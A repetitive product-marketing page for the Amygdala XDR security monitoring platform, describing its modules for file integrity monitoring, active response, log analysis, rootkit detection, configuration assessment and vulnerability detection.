AMYGDALA XDR

Amygdala XDR Extended Detection, Response & Compliance Monitoring Solution

Amygdala XDR is an security detection, visibility, and compliance platform that enables organizations to protect their IT infrastructure from potential threats and actively respond to security threats in real time. It leverages popular security tools, such as Elasticsearch, Kibana, and OSSEC

Amygdala XDR

Amygdala XDR® - Extended Detection, Response & Compliance Monitoring Solution

Amygdala XDR is an security detection, visibility, and compliance platform that enables organizations to protect their IT infrastructure from potential threats and actively respond to security threats in real time. It provides real-time threat detection, incident response capabilities, and centralized logging and analysis of security events across an organization’s IT infrastructure, including servers, endpoints, cloud environments, containers, and networks.

Additionally, the Amygdala XDR platform integrates with other security tools, including intrusion detection and prevention systems (IDS/IPS), vulnerability scanners, and SIEM solutions, to provide a comprehensive security solution.

Overview

Amygdala XDR is composed of three primary components: agents, servers, and a web-based user interface (WUI). The agents are installed on endpoints to collect system logs and security events. The collected data is transmitted to the Amygdala XDR server for further analysis and processing. The Amygdala XDR server utilizes Elasticsearch and Kibana to index and visualize the collected data, enabling real-time alerts and reporting to security teams.

In addition to its core components, Amygdala XDR also includes decoders and a ruleset that assist in identifying known and unknown threats, as well as compliance monitoring capabilities to ensure organizations meet regulatory and industry standards. Amygdala XDR provides a robust and adaptable security platform that enables organizations to detect and respond to security incidents in real time. The platform’s nature facilitates community contributions and customization to meet specific security needs.

MOATiT * MOATiT * MOATiT * MOATiT * MOATiT * MOATiT * MOATiT * MOATiT * MOATiT * 

Amygdala XDR Significance

Amygdala XDR provides a robust and adaptable security platform that enables organizations to detect and respond to security incidents in real time. The platform’s nature facilitates community contributions and customization to meet specific security needs.

Amygdala XDR is composed of three primary components: agents, servers, and a web-based user interface (WUI). The agents are installed on endpoints to collect system logs and security events. The collected data is transmitted to the Amygdala XDR server for further analysis and processing. The Amygdala XDR server utilizes Elasticsearch and Kibana to index and visualize the collected data, enabling real-time alerts and reporting to security teams.

In addition to its core components, Amygdala XDR also includes decoders and a ruleset that assist in identifying known and unknown threats, as well as compliance monitoring capabilities to ensure organizations meet regulatory and industry standards.

Industry Difference

Improved Efficiency

Amygdala XDR security solution automates routine tasks, such as threat detection, incident response, and remediation. This automation helps security teams to work more efficiently, freeing up time for other critical tasks.

Enhanced Security Posture

By providing complete visibility into an organization’s IT infrastructure, Amygdala XDR comprehensive security solution helps organizations identify potential vulnerabilities, threats, and risks that could compromise their security. This visibility enables organizations to take proactive measures to mitigate those risks, improving their overall security posture.

Better Compliance Management

Amygdala XDR Comprehensive security solution provides better tools for managing compliance requirements. It helps organizations to track their compliance status, audit their security and data practices, and generates reports to demonstrate compliance with industry standards and regulations.

Reduced Costs

Comprehensive security solutions can help reduce costs associated with security breaches, compliance violations, and other security incidents. By identifying potential risks and vulnerabilities early on, organizations can take proactive steps to mitigate those risks, reducing the potential impact of incidents on their business.

Improved Customer Trust

Amygdala XDR comprehensive security solution helps build trust between an organization and its customers. By demonstrating a commitment to security and compliance, organizations can reassure customers that their data and information are protected.
Conclusion, Amygdala XDR Comprehensive Security, Detection, Visibility, and Compliance Solution makes the security industry better by improving efficiency, enhancing security posture, reducing costs, and building customer trust.

MOATiT * MOATiT * MOATiT * MOATiT * MOATiT * MOATiT * MOATiT * MOATiT * MOATiT * 

Features

Amygdala XDR Key Features

Real-time Threat Detection

Amygdala XDR detects all known and unknown security threats in real-time, by analyzing security events and logs from across an organization's IT infrastructure.

Incident Response

Amygdala XDR incident response capabilities allow security teams to respond to incidents quickly and effectively, reducing the impact of the attack.

Centralized Logging and Analysis

Amygdala XDR collects and analyzes security events and logs from servers, endpoints, cloud environments, containers, and networks, offering centralized logging and analysis capabilities.

Integration with Other Security Tools

Amygdala XDR integrates with other security tools, including IDS/IPS, vulnerability scanners, and SIEM solutions, providing a holistic security solution

Compliance Monitoring

Amygdala XDR offers compliance monitoring capabilities that assist organizations in ensuring that they meet the best industry and regulatory standards.

Amygdala XDR Benefits

Improved Security

Improved Security

Amygdala XDR provides real-time threat detection and incident response capabilities, which can help organizations improve their security posture.

 Increased Visibility

Increased Visibility

Amygdala XDR collects and analyzes security events and logs from across an organization's IT infrastructure, providing increased visibility into security threats.

Faster incident response

Faster incident response

Amygdala XDR's incident response capabilities enable security teams to respond to security incidents effectively, reducing the impact of the assault

Compliance

Compliance

Amygdala XDR compliance monitoring capabilities assist organizations to ensure that they meet industry and regulatory standards.

 Lower costs

Lower costs

Amygdala XDR is an SIEM platform, which helps organizations lower their security costs compared to proprietary solutions

Customization

Customization

The nature of Amygdala XDR enables community contributions and customization to satisfy specific security requirements.

MOATiT * MOATiT * MOATiT * MOATiT * MOATiT * MOATiT * MOATiT * MOATiT * MOATiT * 

Amygdala XDR Security Management

Amygdala XDR is a security management platform that provides endpoint detection and response (EDR), security analytics, and threat detection capabilities. It is designed to help organizations monitor their security posture, identify security threats and respond to them in a timely manner. It consists of a number of different components, including agents, a server, and a web-based management console. The agents are installed on endpoints and collect security-related data, which is then forwarded to the server for analysis. The server processes the data and provides alerts and reports to the management console.

Amygdala XDR uses a variety of techniques to detect threats in real-time, including signature-based detection, behavioral analysis, and anomaly detection.

Multi-tenancy

Amygdala XDR Multi-tenancy supports multiple independent groups, or tenants, within a single Amygdala XDR cluster. Each has its own index patterns, mappings, queries, dashboards, and visualizations in Amygdala XDR. It is useful in scenarios where multiple applications, customers, or teams need to share a common Elasticsearch infrastructure while keeping their data separated and isolated from each other.

Amygdala XDR provides several options for implementing multi-tenancy, including

Index-based multi-tenancy

Index-based multi-tenancy

In Amygdala XDR Index-based multi-tenancy, each tenant is assigned a separate set of indices. The indices are prefixed with a unique identifier for each tenant, such as "tenant1-" or "tenant2-", to keep them separate and Kibana can be configured to show only the indices of a particular tenant to that tenant's users.

Namespace-based multi-tenancy

Namespace-based multi-tenancy

In Amygdala XDR Namespace-based multi-tenancy, each tenant is assigned a unique namespace, which is used to isolate their data from other tenants. It is a logical grouping of Elasticsearch resources, including indices, documents, queries, and visualizations. Users of a particular tenant can only see and interact with resources within their own namespace.

Role-based multi-tenancy

Role-based multi-tenancy

In Amygdala XDR Role-based multi-tenancy, each tenant is assigned a set of roles that determine the level of access and permissions for that tenant's users. For example, a tenant may have a "read-only" role that only allows users to view data, while another tenant may have a "read-write" role that allows users to create and modify data.

Overall, multi-tenancy is an important feature in Amygdala XDR that allows users to share a common Amygdala XDR infrastructure while keeping their data separate and secure. It provides a flexible and scalable solution for organizations that need to support multiple applications, customers, or teams within a single Amygdala XDR cluster.

Dev Tools

Dev Tools is a powerful tool that allows developers to interact with the Amygdala XDR using a variety of methods. It provides a console interface for developers to send requests directly to Elasticsearch and inspect the results in real-time. The Dev Tools tab can be accessed by clicking on the Dev Tools icon on the left-hand side of the UI.

Console

Console

The console interface allows developers to send requests to Amygdala XDR using a user-friendly interface. Requests can be made using the REST API, and the console supports a wide range of HTTP methods, including GET, POST, PUT, DELETE, and more.

Autocomplete

Autocomplete

The console interface provides an autocomplete module that can be used to quickly build complex queries. This module helps developers avoid syntax errors and improve the speed and accuracy of their queries.

Snippets

Snippets

The Dev Tools provides a wide range of snippets that developers can use to quickly build common queries. These snippets can be customized and saved for later use.

Import/Export

Import/Export

The Dev Tools allows developers to import and export requests as JSON files. This module can be used to share requests between team members or between different instances of UI.

API Documentation

API Documentation

The Dev Tools provide documentation for the Amygdala XDR REST API. This documentation can be used as a reference when building requests or troubleshooting issues.

Explore More

Still deciding? Don’t worry—discuss with our trusted advisors and subject matter experts

Roadmap for each Module

File Integrity Monitoring

Amygdala XDR File Integrity Monitoring (FIM) module allows your organization to detect and monitor changes made to files or file systems, directories, and other critical system objects on your servers and workstations to detect unauthorized modifications or tampering. It uses an agent-based approach to monitor file changes. The agent periodically scans the file system and sends data to the centralized Amygdala XDR manager, who can immediately alert administrators of any changes or suspicious activities.

Technical Description

The Amygdala XDR FIM module tracks a variety of file parameters such as rights, ownership, content, size, and timestamps. It allows you to detect changes made to critical system files, configuration files, or even user-generated files in specific directories. In addition to real-time alerts, Amygdala XDR’s FIM module also investigates your historical data that can be utilized for scrutinizing past events and monitoring changes over an extended period. The module can also be customized to exclude certain files or directories from monitoring and can be used to comply with various regulatory requirements, such as PCI DSS or HIPAA.

Amygdala XDR File Integrity monitoring uses an agent-based approach to monitor the file system. The agent runs on the target system and periodically scans the file system for changes. The agent can be configured to monitor specific directories, files, or file attributes. It collects metadata about each file it monitors, such as file size, timestamps, permissions, and ownership. The Amygdala XDR File Integrity monitoring also calculates a hash value for each file, which is a unique identifier based on the file content. Overall, Amygdala XDR’s FIM module detects and responds to changes to critical files and system objects on your servers and workstations. It not only provides real-time alerts but also furnishes historical data that can be utilized for scrutinizing past events and monitoring modifications over an extended period

Features

Real-time monitoring

Real-time monitoring

Amygdala XDR File Integrity monitoring monitors your file system, detecting changes as soon as they occur.

File attributes monitoring

File attributes monitoring

Amygdala XDR File Integrity monitoring monitors a wide range of file attributes, such as file content, permissions, ownership, timestamps, and more.

Historical data

Historical data

Amygdala XDR File Integrity monitoring provides historical data, allowing administrators to investigate past events and track changes over time.

Threat Detection

Threat Detection

Amygdala XDR File Integrity monitoring detects malicious activities, such as malware infections or unauthorized changes to critical files

Compliance

Compliance

Amygdala XDR File Integrity monitoring helps your organizations to comply with regulatory requirements, such as PCI DSS or HIPAA, which mandate file integrity monitoring.

Configuration Management

Configuration Management

Amygdala XDR File Integrity monitoring maintains the configuration of your systems, detecting changes that may lead to system instability or downtime.

Incident response

Incident response

Amygdala XDR File Integrity monitoring responds to your security incidents more quickly and effectively, by providing real-time alerts and historical data

Technology-Supported, Protocols

Here are some of the technologies and protocols supported by Amygdala XDR File Integrity monitoring
Operating Systems

Operating Systems

Amygdala XDR File Integrity monitoring supports a variety of operating systems, including Windows, Linux, Unix, and macOS.

File Systems

File Systems

Amygdala XDR File Integrity monitoring supports a variety of file systems, including NTFS, FAT, EXT4, XFS, and HFS+. The FIM module must be compatible with the target file system to function properly.It uses a variety of protocols, including HTTP/HTTPS, TCP, and UDP.

Module Dependency

Here are some of the key dependencies of Amygdala XDR File Integrity monitoring:

Amygdala XDR FIM is dependent on the operating system to access and monitor files and directories. The FIM module must be compatible with the target operating system to function properly.

Active Response

Overview

The Active Response module of the Amygdala XDR enables your organizations to automate responses to security events. The active response allows security administrators to take immediate action when an alert is triggered, without manual intervention. Amygdala XDR active response module provides a variety of actions like
Blocking IP addresses

Blocking IP addresses

When an alert is triggered, Amygdala XDR automatically block your traffic and IP address associated with the event. It is done at the firewall or network layer, preventing further attacks from the same source

Terminating processes

Terminating processes

When an alert is triggered, Amygdala XDR automatically terminate your process associated with the event. It is used to stop malicious software from continuing to run on the system.

Quarantining files

Quarantining files

When an alert is triggered, Amygdala XDR automatically quarantine your files associated with the event. It is done to prevent malware from spreading to other systems.

Running scripts

Running scripts

When an alert is triggered, Amygdala XDR automatically run your scripts that perform custom actions. It is done to automate the response to specific types of events.

 Notifying administrators

Notifying administrators

When an alert is triggered, Amygdala XDR automatically notify your administrators via email, SMS, or other methods. It is done to ensure that administrators are aware of the event and can take appropriate action.

Features

Here are some of the key features of the Amygdala XDR’s Active Response module:

Automated Response

Automated Response

The Amygdala XDR Active response enables the automation of your security operations, allowing administrators to respond quickly and efficiently to security events. It reduces the time it takes to detect and respond to security incidents, helping to minimize the potential impact of an attack.

Customizable Actions

Customizable Actions

Amygdala XDR File Integrity monitoring supports a variety of file systems, including NTFS, FAT, EXT4, XFS, and HFS+. The FIM module must be compatible with the target file system to function properly.It uses a variety of protocols, including HTTP/HTTPS, TCP, and UDP.

Integrated Workflow

Integrated Workflow

The Active Response module is integrated with Amygdala XDR's broader security platform, which provides a centralized console for managing security events. This integration allows your administrators to see alerts in real-time, evaluate the severity of each alert, and take appropriate action.

Regulatory Compliance

Regulatory Compliance

The Active Response module helps organizations meet compliance requirements by providing automated responses to security events that are consistent with industry best practices and regulatory standards. It helps organizations avoid fines and other penalties associated with non-compliance.

Scalability

Scalability

Amygdala XDR's Active Response module is designed to work with large and complex environments, making it suitable for organizations of all sizes. It is deployed on-premises or in the cloud and integrated with other security tools to provide a comprehensive security solution.

Technical Description

When a security event is detected by the Amygdala XDR agent, an alert is generated and sent to the Amygdala XDR server for processing. The Amygdala XDR server receives the alert and evaluates its severity and relevance. Based on pre-defined rules and policies, the server determines whether an active response is required. If an active response is required, the Amygdala XDR server triggers the appropriate response action, it includes blocking IP addresses, terminating processes, quarantining files, or running scripts.

The response action is executed on the affected system(s). For example, if the response action is to block an IP address, the Amygdala XDR server sends a command to the firewall or network device to block traffic from the offending IP address. The Amygdala XDR server logs the response action and sends notifications to the appropriate administrators. It provides a record of the response to the security event and allows administrators to review and verify the effectiveness of the response.

Technology-Supported, Protocols

Operating Systems

Operating Systems

The Active Response module is used with a variety of operating systems, including Windows, Linux, and macOS. This allows administrators to respond to security events on any type of system in their environment.

Network Devices

Network Devices

The Active Response module supports a range of network devices, including routers, switches, and firewalls. This allows administrators to automate responses to security events at the network level, such as blocking traffic from a particular IP address.

Cloud Services

Cloud Services

The Active Response module is integrated with various cloud services, such as AWS, Azure, and Google Cloud. This allows administrators to automate responses to security events in cloud environments.

Databases

Databases

The Active Response module is used with different types of databases, such as MySQL, PostgreSQL, and Microsoft SQL Server. This allows administrators to automate responses to security events that affect databases.

Protocols

Protocols

The Active Response module supports various protocols, including TCP, UDP, ICMP, and HTTP. This allows administrators to automate responses to security events that use these protocols.

Module Dependency

Key dependencies of the Active Response module

The Active Response module supports various protocols, including TCP, UDP, ICMP, and HTTP. This allows administrators to automate responses to security events that use these protocols.

System Inventory

The System Inventory module of the Amygdala XDR provides an automated way to collect information about the hardware and software configuration of your systems being monitored by the Amygdala XDR. This module helps organizations maintain an up-to-date inventory of all the systems in their environment.

Hardware Information :The module collects your information about the IT components of a system, such as a processor, memory, storage devices, and network interfaces.

Software Information :The module collects your information about the installed software on a system, including the os, system patches, and installed applications.

System Events :The module also collects your system events, such as logins, logouts, and system reboots. This information can be used to monitor system availability and detect security events.

Features

Automated Data Collection

Automated Data Collection

The System Inventory module automatically collects your information about the hardware and software configuration of all the systems in the environment, eliminating the need for manual data collection.

Asset Tracking

Asset Tracking

The System Inventory module helps your organizations maintain an up-to-date inventory of all the systems in their environment, making it easier to track assets and ensure compliance with security policies.

Monitoring System Changes

Monitoring System Changes

The System Inventory module detects changes to the system configuration, such as the installation of new software or changes to system settings, helping to identify potential security risks.

Integration with Other Amygdala XDR Modules

Integration with Other Amygdala XDR Modules

The System Inventory module integrates with other Amygdala XDR modules, such as the Vulnerability Detection module and the Compliance module, to provide a comprehensive view of the security posture of the organization.

Technical Description

The Amygdala XDR System Inventory module collects information about the hardware components of a system, such as a processor, memory, storage devices, and network interfaces. This information is collected using system commands and utilities, such as “lshw”, “dmidecode”, and “ifconfig”. It collects information about the installed software on a system, including the operating system, system patches, and installed applications. This information is collected using system commands and utilities, such as “dpkg”, “rpm”, and “yum”. It also collects system events, such as logins, logouts, and system reboots. Amygdala XDR System Inventory collects information from system log files and event log

Technology-Supported, Protocols

The System Inventory module in Amygdala XDR uses Amygdala XDR agents to collect system information, which is sent to the Amygdala XDR Manager for analysis and reporting. The agents can collect system information from a variety of technologies and protocols, including:
The System Inventory module collects system information from various operating systems, including Linux, Windows, macOS, and FreeBSD.

Module Dependency

The System Inventory module in Amygdala XDR has a few dependencies on other modules to function properly:

Agents

Agents

The System Inventory module relies on agents to collect system information from the monitored systems. Without agents, the module cannot collect data.

Amygdala XDR Manager

Amygdala XDR Manager

The agents send the collected system information to the Amygdala XDR Manager, where it is analyzed and reported on. Without the Amygdala XDR Manager, the system inventory data cannot be processed or viewed.

 Configuration Files

Configuration Files

The System Inventory module uses configuration files to determine what data to collect and how to collect it. Without proper configuration files, the module may not collect the desired data or may collect too much data, leading to performance issues.

Operating System APIs and Utilities

Operating System APIs and Utilities

The System Inventory module relies on various operating system APIs and utilities to collect system information, such as "lshw" and "dmidecode" on Linux or WMI on Windows. Without these APIs and utilities, the module may not be able to collect all desired information

Dashboards

Cloud Security

The Cloud Security module of Amygdala XDR is designed to provide security monitoring and threat detection for cloud environments, specifically Amazon Web Services (AWS) and Microsoft Azure. This module is built on top of the Amygdala XDR platform and leverages its capabilities to provide comprehensive security monitoring and analysis for cloud environments. The Cloud Security module provides visibility into cloud infrastructure, such as virtual machines, storage, and networks, and monitors for security events and threats. It also integrates with cloud provider APIs to collect metadata, such as configuration and usage information, to provide a complete view of the cloud environment.

Features

Configuration Assessment

Configuration Assessment

The module assesses the configuration of your cloud infrastructure, such as virtual machines and storage, to identify misconfigurations that could lead to security issues.

Threat Detection

Threat Detection

The module uses threat intelligence and behavior analysis to detect your security threats in the cloud environment.

 Log Analysis

Log Analysis

The module collects and analyzes your log data from cloud infrastructure to identify security events and anomalies.

Compliance Monitoring

Compliance Monitoring

The module helps your organizations ensure compliance with regulatory requirements, such as HIPAA or PCI DSS, by monitoring cloud infrastructure for non-compliant activities.

Real-time Alerts

Real-time Alerts

The module generates real-time alerts for security events and threats in the cloud environment.

Technical Description

The Cloud Security module of Amygdala XDR is designed to provide security monitoring and threat detection for cloud environments, specifically Amazon Web Services (AWS) and Microsoft Azure. The module consists of several components that work together to provide comprehensive security monitoring and analysis for cloud environments.

The Amygdala XDR Agent is installed on cloud instances and collects log data and system metrics from the instance. It also performs configuration assessment checks to identify misconfigurations that could lead to security issues.

Technology-Supported, Protocols

The Cloud Security module of Amygdala XDR supports several technologies and protocols to monitor and secure cloud environments. Some of the key technologies and protocols supported by the module include:

Amazon Web Services (AWS)

Amazon Web Services (AWS)

The Cloud Security module supports AWS and leverages AWS APIs to collect metadata, such as configuration and usage information, from cloud infrastructure.

Microsoft Azure

Microsoft Azure

The module also supports Microsoft Azure and leverages Azure APIs to collect metadata from Azure resources.

Amygdala XDR API

Amygdala XDR API

The Cloud Security module uses the Amygdala XDR API to communicate with cloud provider APIs and collect metadata from cloud infrastructure.

Syslog

Syslog

The module can collect log data from cloud infrastructure using the Syslog protocol.

CloudTrail

CloudTrail

The Cloud Security module can collect CloudTrail logs from AWS to monitor user activity and API usage in the cloud environment.

Security Groups

Security Groups

The module can monitor security groups in AWS and Azure to ensure that only authorized traffic is allowed.

Module Dependency

Amygdala XDR Agent

The Amygdala XDR Agent is installed on cloud instances and is responsible for collecting log data and system metrics from the instance. The Cloud Security module depends on the Amygdala XDR Agent to collect data from cloud infrastructure.

Amygdala XDR Manager

The Amygdala XDR Manager is the central component of the Cloud Security module and is responsible for processing and analyzing log data, system metrics, and metadata collected from cloud infrastructure. The module depends on the Amygdala XDR Manager to generate real-time alerts for security events and threats in the cloud environment.

Amygdala XDR API

The Cloud Security module uses the Amygdala XDR API to communicate between the Amygdala XDR Manager and cloud provider APIs to collect metadata from cloud infrastructure.

Cloud Provider APIs

The Cloud Security module depends on cloud provider APIs, such as AWS APIs and Azure APIs, to collect metadata from cloud infrastructure.

Log Data Analysis

Amygdala XDR provides log data analysis as one of its core module. This module enables your organization to collect, process, and analyze log data from a wide range of sources to gain insights into your system and network activity. Here’s an overview of how to log data analysis works in the Amygdala XDR.

Amygdala XDR collects your log data from a variety of sources, including system logs, application logs, network devices, and cloud services and supports a wide range of log formats and provides pre-built decoders for common log types. It uses decoders to parse and normalize log data into a common format, making it easier to search, analyze, and correlate events across different sources. Amygdala XDR provides a range of built-in rules and correlation logic to help you analyze log data and identify potential security threats. This includes detecting patterns of behavior that may indicate an attack, such as repeated login failures, unusual file access patterns, or suspicious network traffic.

Features

Centralized log management

Centralized log management

With Amygdala XDR, you can collect, normalize, and store log data from a wide range of sources in a centralized location. This can make it easier to manage and analyze security events across your entire environment.

Real-time analysis

Real-time analysis

Amygdala XDR's log data analysis engine analyzes your log data in real time, allowing you to detect potential security threats as they occur. This can help you respond to security incidents more quickly and effectively.

Advanced correlation

Advanced correlation

Amygdala XDR uses advanced correlation techniques to identify patterns of behavior that may indicate a security threat. This includes cross-referencing log data from different sources to detect complex attacks that may span multiple systems or components.
Overall, Amygdala XDR's log data analysis module provides a powerful way to manage and analyze security events across your environment. By centralizing log data and applying advanced correlation techniques, you can better detect and respond to potential security threats and improve your overall security posture.

Technical Description

Amygdala XDR’s log data analysis module uses an event-driven architecture that is designed to collect, normalize, and analyze log data from a wide range of sources. The architecture consists of the following components:

Amygdala XDR supports a variety of data collectors for different log sources, including Amygdala XDR agents, Syslog, and APIs. These collectors are responsible for gathering log data and sending it to the Amygdala XDR manager.

Technology-Supported, Protocols

Amygdala XDR’s log data analysis module supports a wide range of technologies and protocols for collecting and analyzing log data. Here are some of the key technologies and protocols that are used:

Syslog

Syslog

Amygdala XDR can collect and analyze syslog data from a variety of sources, including Unix/Linux systems, network devices, and applications.

Amygdala XDR agents

Amygdala XDR agents

Amygdala XDR provides Amygdala XDR agents for Windows, Linux, and macOS that can collect and forward log data to the Amygdala XDR manager for analysis.

APIs

APIs

Amygdala XDR supports a variety of APIs that can be used to collect log data from third-party applications and services.

Amygdala XDR Indexer

Amygdala XDR Indexer

Amygdala XDR uses Amygdala XDR Indexer to store and search log data. Amygdala XDR Indexer provides a fast and scalable way to store and search large volumes of data.

Logstash

Logstash

Amygdala XDR uses Logstash to collect, parse, and normalize log data from different sources. Logstash provides a flexible and extensible way to process log data before it is sent to Amygdala XDR Indexer.

Pattern matching

Pattern matching

Amygdala XDR detects patterns of behavior that may indicate an attack, such as repeated login failures, unusual file access patterns, or suspicious network traffic.

Anomaly detection

Anomaly detection

Amygdala XDR detects anomalous behavior by comparing log data to established baselines or statistical models. This can help identify new and emerging threats that may not be covered by the traditional rules-based analysis.

Cross-referencing

Cross-referencing

Amygdala XDR can cross-reference log data from different sources to detect complex attacks that may span multiple systems or components.

Module Dependency

Amygdala XDR Indexer

Amygdala XDR's log data analysis module relies on Amygdala XDR Indexer to store and search log data. Amygdala XDR Indexer is an open-source search and analytics engine that provides a fast and scalable way to store and search large volumes of data.

Logstash

Amygdala XDR uses Logstash to collect, parse, and normalize log data from different sources. Logstash is an open-source data processing pipeline that can be used to collect, process, and forward data.

Amygdala XDR Dashboard

Amygdala XDR's log data analysis module uses Amygdala XDR Dashboard to visualize log data and create custom dashboards and reports. Amygdala XDR Dashboard is an open-source data visualization solution that can be used to create interactive visualizations, such as charts, graphs, and tables.

OSSEC

Amygdala XDR's log data analysis module is based on the OSSEC project, which is an open-source host-based intrusion detection system. OSSEC provides a range of modules for analyzing system events and detecting potential security threats.

OpenSCAP

Amygdala XDR's log data analysis module uses OpenSCAP to perform vulnerability assessments and compliance checks on systems. OpenSCAP is an open-source implementation of the Security Content Automation Protocol (SCAP) and provides a set of tools and libraries for assessing system security.

Suricata

Amygdala XDR's log data analysis module integrates with Suricata, which is an open-source network intrusion detection system. Suricata provides a range of modules for detecting and preventing network-based attacks.

Dashboards

Rootkit Detection

Amygdala XDR’s rootkit detection module provides a way to detect and respond to rootkits, which are stealthy malware that can hide their presence on a compromised system. The module is designed to identify any unauthorized changes to the system that might indicate the presence of a rootkit. Amygdala XDR’s rootkit detection module uses a variety of techniques to detect rootkits, including file integrity monitoring, process monitoring, and kernel module monitoring. It can detect changes to critical system files, the creation of new processes, and the loading of unauthorized kernel modules.

In addition to detecting rootkits, Amygdala XDR’s rootkit detection module can also take actions to respond to rootkits, such as alerting security teams, blocking network traffic, or quarantining affected systems. The module is highly customizable and can be tailored to the specific needs of an organization. It can be configured to monitor specific files, directories, and processes, and to trigger alerts based on specific events or thresholds.

Features

Early Detection of Rootkits

Early Detection of Rootkits

mygdala XDR's rootkit detection module detects rootkits early before they have a chance to cause serious damage to a system or network. This can help organizations respond quickly and minimize the impact of an attack.

Multi-platform Support

Multi-platform Support

Amygdala XDR's rootkit detection module supports a wide range of operating systems, including Windows, Linux, macOS, and others. This makes it a flexible and versatile solution for organizations with diverse IT environments.

File Integrity Monitoring

File Integrity Monitoring

Amygdala XDR's rootkit detection module includes file integrity monitoring, which can detect changes to critical system files that may be indicative of a rootkit. This can help organizations identify suspicious activity and take action to investigate and remediate potential threats.

Technical Description

Amygdala XDR’s rootkit detection module uses a combination of techniques to detect and respond to rootkits, which are stealthy malware that can hide their presence on a compromised system. The module includes file integrity monitoring, which detects changes to critical system files that may be indicative of a rootkit. It also includes process monitoring, which detects the creation of new processes that may be associated with a rootkit. Additionally, kernel module monitoring is included to detect the loading of unauthorized kernel modules that may be associated with a rootkit.

Amygdala XDR’s rootkit detection module leverages your system-level APIs and kernel modules to monitor system activity and detect signs of a rootkit. It uses the Open-Source Security Information Management (OSSIM) framework for event correlation and analysis, allowing it to generate alerts and notifications based on specific criteria.

Technology-Supported, Protocols

Amygdala XDR’s rootkit detection module does not rely on any specific network protocols, as it primarily focuses on monitoring system-level activity rather than network traffic. It monitors system files, processes, and kernel modules to detect signs of a rootkit, and can generate alerts and notifications based on specific criteria. While the module can be integrated with a wide range of SIEM solutions and other security tools, it does not use any specific protocols of its own.

Amygdala XDR’s rootkit detection module uses a variety of system-level APIs and kernel modules to monitor system activity and detect signs of a rootkit. It leverages a range of open-source technologies, including the Open-Source Security Information Management (OSSIM) framework for event correlation and analysis.

Module Dependency

Amygdala XDR’s rootkit detection module uses a variety of open-source libraries and projects to help identify and respond to rootkits. Some of the key libraries and projects that the module depends on include:

System calls and kernel modules

Amygdala XDR's rootkit detection f module uses a range of system calls and kernel modules to monitor system activity and detect signs of a rootkit. These low-level tools provide a granular view of system behavior, enabling the module to identify even subtle indications of a rootkit.

Open-Source Security Information Management (OSSIM)

Amygdala XDR's rootkit detection module is built on the OSSIM framework, which provides a scalable, centralized platform for managing security information. OSSIM enables the module to collect and correlate data from multiple sources, enhancing its ability to detect rootkits. File Integrity Checking (FIM) tools: Amygdala XDR's rootkit detection module uses FIM tools to monitor changes to critical system files and directories. By comparing the current state of a file to a known baseline, the module can detect if a file has been modified or replaced by a rootkit.

Machine learning algorithms: Amygdala XDR's rootkit detection module incorporates machine learning algorithms to enhance its detection capabilities. These algorithms use historical data to identify patterns and anomalies that may indicate the presence of a rootkit.

Dashboards

Configuration Assessment

Amygdala XDR’s configuration assessment module enables your organizations to monitor the configuration of their systems and applications for compliance with security policies, best practices, and regulatory requirements. The module allows organizations to define their policies or use pre-defined templates to assess configurations and detect changes that may represent security risks. Configuration assessment covers a wide range of items, including OS-level settings, application settings, file permissions, and registry keys.

Amygdala XDR’s configuration assessment module provides real-time alerts and notifications when a configuration change violates a policy. This allows organizations to respond quickly and prevent security incidents before they can cause harm. The module also provides detailed reports on configuration assessments, making it easy to demonstrate compliance with internal and external policies and standards.

Benefits & Modules

Automated configuration assessment

Automated configuration assessment

Amygdala XDR's configuration assessment module enables organizations to automate the process of assessing the configuration of their systems and applications. This reduces the manual effort required to ensure compliance with security policies and best practices and provides real-time alerts when configuration changes violate policies.

Customizable policies

Customizable policies

Amygdala XDR's configuration assessment module allows organizations to define their policies or use pre-defined templates to assess configurations. This enables organizations to tailor the assessments to their specific security policies and compliance requirements.

Real-time alerts

Real-time alerts

The module provides real-time alerts and notifications when a configuration change violates a policy. This allows organizations to respond quickly to potential security incidents and take action to prevent harm.

Comprehensive reports

Comprehensive reports

Amygdala XDR's configuration assessment module provides detailed reports on configuration assessments, making it easy to demonstrate compliance with internal and external policies and standards.

Integration with other security tools

Integration with other security tools

Amygdala XDR's configuration assessment module can be integrated with other security tools, such as intrusion detection systems, to provide a more comprehensive view of security threats.

Technical Description

Amygdala XDR’s Configuration Assessment module allows for the assessment and analysis of the configuration of a system or application to ensure compliance with security policies and best practices. This module is implemented through the use of Amygdala XDR rules and plugins that are specifically designed to detect and report on configuration issues or misconfigurations. These rules and plugins are regularly updated to ensure they are up-to-date with the latest security policies and best practices.

The Configuration Assessment module includes a set of pre-defined templates that can be used to quickly assess and analyze the configuration of common applications and services. Users can also create custom templates for more specialized configurations. The Configuration Assessment module also provides a dashboard that allows users to monitor and track the compliance status of their systems over time, and to quickly identify and address any configuration issues or misconfigurations that may be present.

Overall, the Configuration Assessment module is an important tool for ensuring the security and compliance of systems and applications, and for identifying and addressing potential security issues before they can be exploited by attackers.

Technology-Supported, Protocols

Amygdala XDR’s Configuration Assessment module uses several technologies and protocols to perform its functions.

Firstly, Amygdala XDR uses OSSEC, which is an open-source host-based intrusion detection system, to collect and analyze data related to system configuration. Amygdala XDR also leverages the Extensible Configuration Checklist Description Format (XCCDF) and Open Vulnerability and Assessment Language (OVAL) protocols to define the configuration policies and vulnerability assessments that are used to evaluate system configurations.

In addition, Amygdala XDR’s Configuration Assessment module integrates with the Security Content Automation Protocol (SCAP) to support the exchange of configuration and vulnerability information between different systems and applications. Finally, the Amygdala XDR Configuration Assessment module uses a range of other technologies and tools, such as the Unix shell and Python scripting language, to implement its functions and modules.

Module Dependency

Amygdala XDR’s Configuration Assessment module is built on several open-source libraries and projects, including:

As mentioned earlier, Amygdala XDR uses OSSEC as the underlying host-based intrusion detection system to collect and analyze system configuration data.

Dashboards

Vulnerability Detection

Amygdala XDR’s Vulnerability Detection is a module that can identify known software vulnerabilities in the environment, both at the operating system and application levels. It leverages information from various sources, such as the National Vulnerability Database (NVD), to detect and alert to vulnerabilities affecting the environment. The module can also integrate with patch management systems to enable automated remediation of vulnerabilities.

Amygdala XDR’s Vulnerability Detection works by scanning the systems in the environment for known vulnerabilities based on the information available in various databases. It can scan for vulnerabilities in the operating system, web applications, and databases, among other areas. The module can also provide information on the severity of the vulnerability and any available remediation steps.

Features

Comprehensive vulnerability scanning

Comprehensive vulnerability scanning

Amygdala XDR's Vulnerability Detection scans systems in the environment for known vulnerabilities in various areas, including the operating system, web applications, and databases.

 Integration with external vulnerability databases

Integration with external vulnerability databases

The module leverages information from external sources, such as the National Vulnerability Database (NVD), to detect and alert vulnerabilities affecting the environment.

Remediation automation

Remediation automation

